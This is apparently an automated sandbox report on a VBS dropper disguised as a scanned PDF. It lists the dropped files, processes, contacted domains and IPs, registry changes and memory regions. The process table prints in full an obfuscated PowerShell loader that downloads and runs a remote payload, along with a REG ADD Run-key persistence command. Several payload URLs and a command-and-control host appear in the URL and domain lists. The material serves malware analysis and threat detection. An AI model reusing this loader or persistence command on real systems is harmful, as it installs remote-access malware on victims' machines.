Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Scanned_22C-6e24090516030.pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hzcarqt.bi3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfwzfhji.lxz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0u35ivt.vqd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymdhgdxb.fua.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Sttefiskenes.Tav
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping gormezl_6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac
#>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If
($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function
Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l
Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M
al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j
FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta
0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/
Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre
uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t
Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel
';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically
(Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS
Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically
(Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be
yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im
');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A
acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel
Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP
v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu
tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it
ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically
($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[
luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw
');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee
ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme
IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically
(Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH
AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L
Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden)
{Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve
') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr
');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe
tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY
ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery
' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU
banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss.
ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically
(Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn
aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc
t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs
iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo
pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha
$femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK
naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd
,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS
NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus
ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa
atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO
erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac
#>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If
($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function
Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l
Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M
al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j
FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta
0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/
Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre
uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t
Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel
';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically
(Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS
Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically
(Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be
yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im
');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A
acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel
Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP
v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu
tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it
ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically
($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[
luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw
');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee
ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme
IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically
(Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH
AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L
Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden)
{Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve
') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr
');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe
tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY
ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery
' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU
banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss.
ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically
(Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn
aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc
t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs
iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo
pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha
$femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK
naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd
,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS
NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus
ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa
atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO
erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle
1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blackass.duckdns.org
|
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.groupriam.com/Mandschauvinisme.snp
|
199.103.62.205
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.groupriam.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB_q
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.groupriam.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://bruta.pl/Mandschauvinisme.snp
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.groupriam.com/PrOrl135.bin
|
199.103.62.205
|
||
|
http://groupriam.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://go.microsofd
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blackass.duckdns.org
|
193.187.91.214
|
|
|
|
gormezl_6777.6777.6777.677e
|
unknown
|
|
|
|
www.groupriam.com
|
unknown
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
s-part-0017.t-0009.t-msedge.net
|
13.107.246.45
|
||
|
groupriam.com
|
199.103.62.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.187.91.214
|
blackass.duckdns.org
|
Sweden
|
|
|
|
199.103.62.205
|
groupriam.com
|
Canada
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-K8KWVT
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-K8KWVT
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-K8KWVT
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Meddling
|
Udmundingers
|
||
|
HKEY_CURRENT_USER\Environment
|
Griddles
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9B41000
|
heap
|
page read and write
|
|
|
|
9B0E000
|
heap
|
page read and write
|
|
|
|
9B41000
|
heap
|
page read and write
|
|
|
|
AAA8000
|
direct allocation
|
page execute and read and write
|
|
|
|
9AAA000
|
heap
|
page read and write
|
|
|
|
8E20000
|
direct allocation
|
page execute and read and write
|
|
|
|
53D8000
|
remote allocation
|
page execute and read and write
|
|
|
|
229F6255000
|
trusted library allocation
|
page read and write
|
|
|
|
6142000
|
trusted library allocation
|
page read and write
|
|
|
|
18D17600000
|
heap
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
796E000
|
heap
|
page read and write
|
||
|
229E7F5A000
|
trusted library allocation
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A00000
|
heap
|
page read and write
|
||
|
3400000
|
trusted library allocation
|
page read and write
|
||
|
9960000
|
direct allocation
|
page read and write
|
||
|
3700000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D194E9000
|
heap
|
page read and write
|
||
|
4F91000
|
trusted library allocation
|
page read and write
|
||
|
4D9E000
|
stack
|
page read and write
|
||
|
7FFE7CDDB000
|
trusted library allocation
|
page read and write
|
||
|
2548C000
|
stack
|
page read and write
|
||
|
25380000
|
remote allocation
|
page read and write
|
||
|
18D192F7000
|
heap
|
page read and write
|
||
|
332F000
|
stack
|
page read and write
|
||
|
18D17622000
|
heap
|
page read and write
|
||
|
229F64D0000
|
trusted library allocation
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
229E6D7E000
|
trusted library allocation
|
page read and write
|
||
|
18D18EF0000
|
remote allocation
|
page read and write
|
||
|
229FE7E0000
|
heap
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page read and write
|
||
|
36E0000
|
trusted library allocation
|
page read and write
|
||
|
229E4720000
|
heap
|
page read and write
|
||
|
33F0000
|
trusted library allocation
|
page read and write
|
||
|
8B63000
|
heap
|
page read and write
|
||
|
18D1941D000
|
heap
|
page read and write
|
||
|
8757000
|
stack
|
page read and write
|
||
|
254CE000
|
stack
|
page read and write
|
||
|
18D194F3000
|
heap
|
page read and write
|
||
|
18D19581000
|
heap
|
page read and write
|
||
|
229FE81A000
|
heap
|
page read and write
|
||
|
3420000
|
trusted library allocation
|
page read and write
|
||
|
229FE8AE000
|
heap
|
page read and write
|
||
|
7FFE7CDD0000
|
trusted library allocation
|
page read and write
|
||
|
18D1762B000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
25100000
|
direct allocation
|
page read and write
|
||
|
18D17460000
|
heap
|
page read and write
|
||
|
229FE7EA000
|
heap
|
page read and write
|
||
|
C94137E000
|
stack
|
page read and write
|
||
|
18D19407000
|
heap
|
page read and write
|
||
|
18D19302000
|
heap
|
page read and write
|
||
|
C941637000
|
stack
|
page read and write
|
||
|
74C0000
|
direct allocation
|
page read and write
|
||
|
18D19401000
|
heap
|
page read and write
|
||
|
8D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
2518F000
|
stack
|
page read and write
|
||
|
7FFE7CDC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D193F4000
|
heap
|
page read and write
|
||
|
34AA000
|
heap
|
page read and write
|
||
|
98C0000
|
direct allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
99A0000
|
direct allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
79E7000
|
heap
|
page read and write
|
||
|
229F64DE000
|
trusted library allocation
|
page read and write
|
||
|
74F000
|
stack
|
page read and write
|
||
|
229E4860000
|
heap
|
page read and write
|
||
|
8EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E4C000
|
stack
|
page read and write
|
||
|
229FE89A000
|
heap
|
page read and write
|
||
|
18D17560000
|
heap
|
page read and write
